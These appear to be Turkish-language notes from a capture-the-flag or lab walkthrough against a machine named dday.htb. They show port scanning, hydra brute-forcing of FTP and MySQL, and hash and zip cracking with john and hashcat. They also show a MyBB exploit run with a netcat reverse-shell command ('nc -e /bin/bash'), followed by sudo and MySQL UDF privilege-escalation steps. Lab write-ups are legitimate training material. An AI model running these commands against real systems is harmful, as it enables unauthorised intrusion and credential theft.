# Ip Bul
nmap -Pn -A 192.168.238.133 # nmap tarmasında kaç port açık ? 3 port
#ftp versiyonun surumu ne ? vsftpd 3.0.3
# 21 Portu görüldüğünde ilk iş anonim giriş acıkmı değilmi ona bakalım
ftp 192.168.238.133 #Anonymous
# browserden sayfa kontrol edildi
dirb http://192.168.238.133
#forum görüldü. http://192.168.238.133/forum/
# web sayfasını düzetlemek için etc hosts dosyasına ıp ve makına adını yazarsak sayfanın stılini yükler
# host adı :http://dday.htb/forum/misc.php?action=help buradan anlasılyıor
sudo nano /etc/hosts
# http://dday.htb/forum/memberlist.php sitesinde kullanıcı isimleri bulundu
# Bu isimleri bi username.txt kaydedelim -l isim -L username listesi -P password listesi
hydra -l alice -P /home/kali/Masaüstü/rockyou.txt 192.168.238.133 ftp
# [21][ftp] host: 192.168.238.133 login: alice password: hellokitty tesbit edildi.
"""
└─$ ftp 192.168.238.133
Connected to 192.168.238.133.
220 (vsFTPd 3.0.3)
Name (192.168.238.133:kali): alice
331 Please specify the password.
Password:
230 Login successful.
Remote system type is UNIX.
ftp> pwd
Remote directory: /
ftp> ls
229 Entering Extended Passive Mode (|||20304|)
150 Here comes the directory listing.
-rwxr-x--- 1 1001 1001 143734 May 31 2022 backup.zip
226 Directory send OK.
ftp>
get backup.zip # indirdik.
"""
#ftp yorurmluyoruz
john -wordlist=/home/Kali/Masaüstü/rockyou.txt backup
john --show alice
john --show backup
# şifreyi buldu ve sql dosyası cıktı
# cat dosya grep username yaptı kullanıcı adı sıfreler buldu
# txt dosyasına aldı qpas0kjil gibi bişey solunde karmasık herf ve rakamlar var
hashid -m parola
#bu tahmini olarak neyle yazıldıgını gosterır : hascat mode: 2811 oldugu goruldu
hashcat -a 0 2811 hask /Home/Kali/Masaüstü/rockyou.txt
└─$ hashcat --show 2811 parola
2bestfriendkenemy
2bestfirend
# bu şifreleye url gir mybb versiyon numarasını öğren exlotini araştır
searchsploit MyBB 1.8.29
# php/webapps/50924.py kopyala
searchsploit -m php/webapps/50924.py
#50924 exploti indi
python3 50924.py --username www-data --password '2bestfriend1enemy' --host http://dday.htb/forum --cmd 'nc -e /bin/bash 192.168.238.129 1212'
# dinleme başlat tünelden.
nc -nvlp 1212
# Terminal düzeltme için gerekli kodlar
python3 -c "import pty;pty.spawn('/bin/bash')"
/bin/bash -i
export TERM=xterm
stty raw -echo && fg
2. Parça
# dineleye nmonitordan devam
sudo -l # sudo yetkisindeki klasorlara erismek icin yetki verilmiş mi ?
Matching Defaults entries for www-data on d-day:
env_reset, mail_badpass,
secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin
User www-data may run the following commands on d-day:
(mayday) NOPASSWD: /opt/fast_login_user.py ## şifre kullanmadan bu dizindeki kodu calıstırabilir
ls -la
ls -la /opt/fast_login_user.py
cat /opt/fast_login_user.py
sudo -u mayday /opt/fast_login_user.py
# 6 gir numaraya
# buraada hata aldım girmedim mayday'ee
#find -u*s 2>/dev/null #suigbit varmı yokmu kime verılmıs ona bakıldı.
ls -la /usr/bin/pkexec
ss -tupln # acık olan servisler göründü
nano mayday # gizli anahatarını kaydet
chmod 600 mayday
##3306 dinlediğimiz iicn boştu verdik
ssh -i mayday mayday@dday.htb -L 3306:127.0.0.3:3306
#2. terminalda
nmap -Pn 127.0.0.1 yapınca mysql 3306 olarak göreceğiz
#mysql sifresini kırmayı dene
hydra -l root -P /Masaüstü/rockyou.txt 127.0.0.1 mysql
#jackdanias sifresini buldu mysql'in
mysql -u tooy -p jackdanias
#root ile mysql girildi. google my-sql root privesc yazılır. ve bu scriptlerden birini indir.
#https://medium.com/r3d-buck3t/privilege-escalation-with-mysql-user-defined-functions-996ef7d5ceaf kaynak site
#mysql user defined functions exploit # exploti varsa kullanabılırsın
select * from mysqlçfunc; # bunu yazdıgımız varsa mediumdanki son adımları yap cıkıyorsa kaldıgı yeri bul devam et.